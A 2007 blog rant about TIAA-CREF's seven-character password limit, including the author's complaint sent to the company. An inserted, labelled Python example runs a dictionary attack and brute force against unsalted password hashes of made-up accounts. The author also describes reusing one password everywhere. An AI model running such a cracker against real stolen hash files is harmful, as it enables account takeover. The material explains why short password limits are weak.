In this day and age, it is unthinkable that a web site of such financial importance as TIAA-CREF would limit their password field to SEVEN CHARACTERS. That’s right, SEVEN CHARACTERS.
Thus, if a hacker were to somehow gain access to their password file (which, if anyone there is thinking, holds hashes of the passwords rather than the passwords themselves), they could probably recover most of the passwords in it in a matter of minutes, given the computing power of even the average desktop. How?
Well, since seven characters is a nice, round number, people probably make passwords like “Sparky” or “Jason”. The hacker doesn’t have to “decipher” anything, because a password hash isn’t encryption: it is one-way, but it is also deterministic, so the hacker just has to guess well. They take a dictionary file of common words and the most common passwords of seven characters or fewer, run each guess through the same hash function the site used (an unsalted hash gives away which function that is by its length and format alone, so there is no need to try every known algorithm), and compare each result against every entry in the password file. Every match is somebody’s password. Whatever the dictionary misses, the seven-character cap hands over anyway: with the length bounded, the hacker can simply enumerate every possible password, and every all-lowercase password of seven characters or fewer amounts to only about eight billion guesses, which on an ordinary machine is a job measured in hours at most, not years. Either way, they now have a large chunk of everyone’s passwords to log into the TIAA-CREF web site.
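Here is the attack from the paragraph above written out in Python, as an added example that is not part of the original post and has nothing to do with TIAA-CREF’s actual site. It builds a constructed, unsalted hash file for a few made-up accounts, runs a toy wordlist against it, then brute-forces the bounded space for whatever the wordlist missed. The account names, passwords, wordlist and the choice of SHA-256 are all assumptions made for the example.

```python
import hashlib
import itertools
import string

# Constructed sample data for this example; none of it comes from the original post.
# Four made-up accounts whose passwords all fit a seven-character limit.
SAMPLE_ACCOUNTS = {
    "jsmith": "sparky",    # a dictionary word: falls to the wordlist
    "mgarcia": "jason",    # likewise
    "tlee": "zq7",         # not a word, but short: falls to brute force
    "rkhan": "Xp9#k2!",    # mixed case plus symbols: neither attack below reaches it
}

# A toy stand-in for the "dictionary file" of common passwords.
WORDLIST = ["password", "letmein", "sparky", "jason", "monkey", "dragon", "trustno1"]

# Unsalted hex digests reveal the algorithm by their length alone.
HASH_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}

LOWER = string.ascii_lowercase
LOWER_ALNUM = string.ascii_lowercase + string.digits


def make_password_file(accounts, algorithm="sha256"):
    """Produce the 'user:hexdigest' file an attacker might steal (unsalted, fast hash)."""
    return "\n".join(
        f"{user}:{hashlib.new(algorithm, pw.encode()).hexdigest()}"
        for user, pw in accounts.items()
    )


def parse_password_file(text):
    """Map each user to the lowercase hex digest stored for them."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, digest = line.split(":", 1)
        entries[user] = digest.strip().lower()
    return entries


def guess_algorithm(digest):
    """Pick the hash function from the digest length; no trial of every known algorithm needed."""
    try:
        return HASH_BY_HEX_LENGTH[len(digest)]
    except KeyError:
        raise ValueError(f"unrecognised digest length {len(digest)}") from None


def _index_by_digest(entries):
    """Invert user->digest so one hash lookup covers every user sharing that password."""
    wanted = {}
    for user, digest in entries.items():
        wanted.setdefault(digest, []).append(user)
    return wanted


def dictionary_attack(entries, wordlist):
    """Hash each candidate once and look it up: cost grows with the wordlist, not users * words."""
    if not entries:
        return {}
    algorithm = guess_algorithm(next(iter(entries.values())))
    wanted = _index_by_digest(entries)
    cracked = {}
    for word in wordlist:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        for user in wanted.get(digest, ()):
            cracked[user] = word
    return cracked


def brute_force(entries, alphabet=LOWER, max_len=7):
    """Enumerate every string over `alphabet` up to `max_len` characters.

    The seven-character cap is what makes this finite and cheap: without a cap the
    search has no natural stopping point. Returns early once every entry is cracked.
    """
    if not entries:
        return {}
    algorithm = guess_algorithm(next(iter(entries.values())))
    wanted = _index_by_digest(entries)
    cracked = {}
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            digest = hashlib.new(algorithm, candidate.encode()).hexdigest()
            for user in wanted.get(digest, ()):
                cracked[user] = candidate
            if len(cracked) == len(entries):
                return cracked
    return cracked


def keyspace(alphabet_size, max_len):
    """Upper bound on guesses brute_force needs: sum of alphabet_size**n for n = 1..max_len."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    stolen = make_password_file(SAMPLE_ACCOUNTS)
    entries = parse_password_file(stolen)
    print("algorithm:", guess_algorithm(entries["jsmith"]))

    found = dictionary_attack(entries, WORDLIST)
    print("wordlist cracked:", found)

    leftover = {u: d for u, d in entries.items() if u not in found}
    # max_len=3 keeps the demo quick; the full seven-character run is the same loop, just longer.
    found.update(brute_force(leftover, LOWER_ALNUM, max_len=3))
    print("after brute force:", found)

    print(f"all-lowercase, up to 7 chars: {keyspace(26, 7):,} candidates")
    print(f"all printable ASCII, up to 7 chars: {keyspace(95, 7):,} candidates")
```

Two caveats worth knowing before reading too much into this. If the site salts its hashes, the single lookup table in `dictionary_attack` stops working and every guess has to be re-hashed once per user, and if it uses a deliberately slow hash such as bcrypt, the minutes become years. Neither of those rescues the length cap, though: `brute_force` is bounded at seven characters no matter how the hash is stored, and a cap that short is the thing the rest of this post is complaining about.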
This will probably never happen. I’m sure that some other level of security is in place to prevent this from ever happening, and if they’re smart, they don’t even let one single person have access to the password file. But you know what the REAL REASON is that it pisses me off? Because the password I use for everything else is significantly longer than seven characters, and I don’t write any of them down, so, consequently I forget this password every time I want to use the site.
Forget it, I’m just going to start writing down my passwords.
But just to let them know I’m still not happy, I wrote them this charming feedback on their web site.
I see that your webmasters have still limited the password field to SEVEN CHARACTERS.
How long do you plan to persist in this annoying policy? I have over 20 different web sites that I must visit on a regular basis to manage personal business. As such, I choose not to write down any of my passwords, but I instead use the same password for all of them, rotating every now and then. Perhaps not the best, but it’s my choice. So, every 3 months, I have to go through this business of forgetting my ID & Password, calling your number, listening to the vapid recording of “We also invite you to visit our web center at doubleyou doubleyou doubleyou dot tiaa-cref dot org”. DUH! Where do you think I got the PHONE NUMBER from? This is 2007, people. Then, finally, I can contact a rep and get my entire account remade.
Perhaps it does add a level of security to have my account & password reset all the time, and it’s not like hackers are all after retirement accounts. But I’m the worst type of customer, one who does system administration for a living, and I just gotta get my $0.02 in.
There, I’m done ranting and I’ve said my piece. I fully expect my input to be filed away in the “Deleted Items” folder, just like it was 6 months ago. I’m sure this message comes off as a smart-aleck, arrogant know-it-all, but I’m too old to care if I’m wrong or not; I am the customer and… you know.